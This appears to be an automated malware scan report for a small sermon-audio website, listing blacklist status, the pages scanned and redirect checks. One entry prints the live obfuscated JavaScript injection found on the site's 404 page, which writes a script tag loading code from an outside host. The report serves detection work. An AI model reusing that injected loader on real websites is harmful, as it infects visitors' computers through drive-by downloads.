Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=welcometoodf.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://welcometoodf.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://welcometoodf.org/ | 200 OK Content-Length: 6513 Content-Type: text/html | clean |
http://welcometoodf.org/contact.htm | 200 OK Content-Length: 4615 Content-Type: text/html | clean |
http://welcometoodf.org/site.htm | 200 OK Content-Length: 6339 Content-Type: text/html | clean |
http://welcometoodf.org/index.htm | 200 OK Content-Length: 6513 Content-Type: text/html | clean |
http://welcometoodf.org/revelation/28dec2014.mp3 | 200 OK Content-Length: 300919 Content-Type: audio/mpeg | clean |
http://welcometoodf.org/test404page.js | 404 Not Found Content-Length: 3252 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
(function(){var k3V7='%';eval(unescape(('va.72.20.61.3d.22Sc.72iptEn.67ine.22.2cb.3d.22Ve.72sion()+.22.2c.6a.3d.22.22.2cu.3dnav.69ga.74or.2eus.65.72.41.67ent.3b.69f((u.2ein.64e.78O.66(.22Win.22).3e0).26.26.28.75.2eindexOf(.22N.54.206.22).3c0).26.26(d.6fcumen.74.2ecook.69.65.2einde.78.4ff(.22miek.3d1.22).3c.30).26.26(.74ypeof.28zr.76zts.29.21.3dtypeof(.22A.22.29).29.7bzrvzts.3d.22A.22.3beva.6c(.22if(wind.6fw.2e.22+a.2b.22.29j.3dj.2b.22+a+.22M.61j.6fr.22+b.2ba+.22M.69nor.22+b+a+.22B.75.69ld.22+b+.22j.3b.22.29.3bdocument.2ewr.69t.65(.22.3cscri.70t.20src.3d.2f.2fgumbla.72.2ecn.2f.72ss.2f.3fid.3d.22.2bj+.22.3e.3c.5c.2f.73.63.72ipt.3e.22).3b.7d').replace(/./g,k3V7)))})(); --> Antivirus reports:
| ||
http://welcometoodf.org/johns_epistles/standing_alone_part02.mp3 | 200 OK Content-Length: 302367 Content-Type: audio/mpeg | clean |
http://welcometoodf.org/About.htm | 200 OK Content-Length: 6506 Content-Type: text/html | clean |
http://welcometoodf.org/revelation.htm | 200 OK Content-Length: 6045 Content-Type: text/html | clean |
http://welcometoodf.org/topical.htm | 200 OK Content-Length: 18155 Content-Type: text/html | clean |
http://welcometoodf.org/kingdom.htm | 200 OK Content-Length: 11486 Content-Type: text/html | clean |
http://welcometoodf.org/johns_epistles.htm | 200 OK Content-Length: 7104 Content-Type: text/html | clean |
http://welcometoodf.org/love.htm | 200 OK Content-Length: 9540 Content-Type: text/html | clean |
http://welcometoodf.org/2corinthians.htm | 200 OK Content-Length: 18781 Content-Type: text/html | clean |
http://welcometoodf.org/perversions.htm | 200 OK Content-Length: 8353 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: welcometoodf.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 12:45:38 GMT
Accept-Ranges: bytes
ETag: "99c16c3-1971-50b643981db40"
Server: Apache/2.0.52 (Red Hat)
Content-Length: 6513
Content-Type: text/html
Last-Modified: Tue, 30 Dec 2014 00:39:33 GMT
X-Pad: avoid browser bug
...6513 bytes of data.
GET / HTTP/1.1
Host: welcometoodf.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 12:45:38 GMT
Accept-Ranges: bytes
ETag: "99c16c3-1971-50b643981db40"
Server: Apache/2.0.52 (Red Hat)
Content-Length: 6513
Content-Type: text/html
Last-Modified: Tue, 30 Dec 2014 00:39:33 GMT
X-Pad: avoid browser bug
...6513 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: welcometoodf.org
Referer: http://www.google.com/search?q=welcometoodf.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: welcometoodf.org
Referer: http://www.google.com/search?q=welcometoodf.org
Result:
The result is similar to the first query. There are no suspicious redirects found.